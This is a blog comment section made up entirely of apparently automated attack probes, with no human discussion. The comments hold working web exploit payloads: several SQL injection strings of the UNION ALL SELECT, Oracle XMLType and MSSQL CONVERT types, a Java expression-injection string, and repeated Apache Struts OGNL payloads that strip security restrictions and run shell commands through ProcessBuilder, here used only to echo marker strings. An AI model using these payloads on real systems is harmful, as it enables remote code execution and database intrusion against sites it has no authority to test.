358 Comments

  1. ${new java.lang.String(new byte[]{105, 116, 108, 116, 119, 115, 113, 118, 106, 114, 122, 111, 118, 101, 104, 117, 109, 106, 112, 102, 97, 107, 98, 107, 97, 103, 100, 103, 115, 119, 122, 99, 117, 99, 120, 104, 112, 111, 113, 109, 120, 98, 114, 100, 105, 121, 102, 110, 121, 101, 113, 98, 102, 107, 111, 116, 120, 97, 114, 104, 119, 106, 112, 112, 97, 110, 117, 115, 120, 101, 106, 108, 118, 116, 114, 99, 105, 110, 111, 107, 121, 98, 103, 100, 108, 109, 102, 118, 122, 99, 109, 101, 122, 104, 105, 121, 103, 113, 117, 119})}

  2. atestu’ LIMIT 0,1 UNION ALL SELECT NULL,CONCAT(0x384b614865795551,(SELECT (CASE WHEN (5949=5949) THEN 1 ELSE 0 END)),0x384b614865795551),NULL,NULL– end

  3. atestu LIMIT 0,1 UNION ALL SELECT NULL,NULL,NULL,NULL,CONCAT(0x634454485657494d,(SELECT (CASE WHEN (5579=5579) THEN 1 ELSE 0 END)),0x634454485657494d)– end

  4. atestu’ LIMIT 0,1 UNION ALL SELECT CONCAT(0x7451327954394742,(SELECT (CASE WHEN (5928=5928) THEN 1 ELSE 0 END)),0x7451327954394742),NULL– end

  5. %{(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context[‘com.opensymphony.xwork2.ActionContext.container’]).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd=’echo gsaqknojmeuulkzpwtqvribevrjtfx’).(#iswin=(@java.lang.System@getProperty(‘os.name’).toLowerCase().contains(‘win’))).(#cmds=(#iswin?{‘cmd.exe’,’/c’,#cmd}:{‘/bin/bash’,’-c’,#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(@org.apache.commons.io.IOUtils@toString(#process.getInputStream()))}

  6. %{(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context[‘com.opensymphony.xwork2.ActionContext.container’]).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd=’echo jmzauocszhgfedqodeyphnluwknyrr’).(#iswin=(@java.lang.System@getProperty(‘os.name’).toLowerCase().contains(‘win’))).(#cmds=(#iswin?{‘cmd.exe’,’/c’,#cmd}:{‘/bin/bash’,’-c’,#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(@org.apache.commons.io.IOUtils@toString(#process.getInputStream()))}

  7. %{(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context[‘com.opensymphony.xwork2.ActionContext.container’]).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd=’echo yicdlbwaoyumgkjsjlzeghxcnbwoet’).(#iswin=(@java.lang.System@getProperty(‘os.name’).toLowerCase().contains(‘win’))).(#cmds=(#iswin?{‘cmd.exe’,’/c’,#cmd}:{‘/bin/bash’,’-c’,#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(@org.apache.commons.io.IOUtils@toString(#process.getInputStream()))}

  8. atestu’ LIMIT 0,1 UNION ALL SELECT CONCAT(0x7264324c6f655a75,(SELECT (CASE WHEN (5783=5783) THEN 1 ELSE 0 END)),0x7264324c6f655a75),NULL,NULL,NULL,NULL– end

  9. atestu LIMIT 0,1 UNION ALL SELECT NULL,NULL,CONCAT(0x594b38456a754a37,(SELECT (CASE WHEN (5180=5180) THEN 1 ELSE 0 END)),0x594b38456a754a37)– end

  10. %{(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context[‘com.opensymphony.xwork2.ActionContext.container’]).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd=’echo jrmelpngsqukcxnfizkoygabpryhsv’).(#iswin=(@java.lang.System@getProperty(‘os.name’).toLowerCase().contains(‘win’))).(#cmds=(#iswin?{‘cmd.exe’,’/c’,#cmd}:{‘/bin/bash’,’-c’,#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(@org.apache.commons.io.IOUtils@toString(#process.getInputStream()))}

  11. %{(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context[‘com.opensymphony.xwork2.ActionContext.container’]).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd=’echo mzlvaiqpgyrexnwhwcnxdfsrjfqsmv’).(#iswin=(@java.lang.System@getProperty(‘os.name’).toLowerCase().contains(‘win’))).(#cmds=(#iswin?{‘cmd.exe’,’/c’,#cmd}:{‘/bin/bash’,’-c’,#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(@org.apache.commons.io.IOUtils@toString(#process.getInputStream()))}

  12. atestu’ AND 4896=(SELECT UPPER(XMLType(CHR(60)||’p1Qwvk6l’||(SELECT (CASE WHEN (4896=4896) THEN 1 ELSE 0 END) FROM DUAL)||’p1Qwvk6l’||CHR(62))) FROM DUAL) AND ‘p1Qwvk6l’=’p1Qwvk6l

  13. atestu’ AND 4606=CONVERT(INT,(‘HzOLDQ3a’+(SELECT (CASE WHEN (4606=4606) THEN ‘1’ ELSE ‘0’ END))+’HzOLDQ3a’)) AND ‘HzOLDQ3a’=’HzOLDQ3a

  14. atestu LIMIT 0,1 UNION ALL SELECT NULL,NULL,CONCAT(0x416a76426b686374,(SELECT (CASE WHEN (5414=5414) THEN 1 ELSE 0 END)),0x416a76426b686374),NULL,NULL– end

Leave a Reply

Your email address will not be published. Required fields are marked *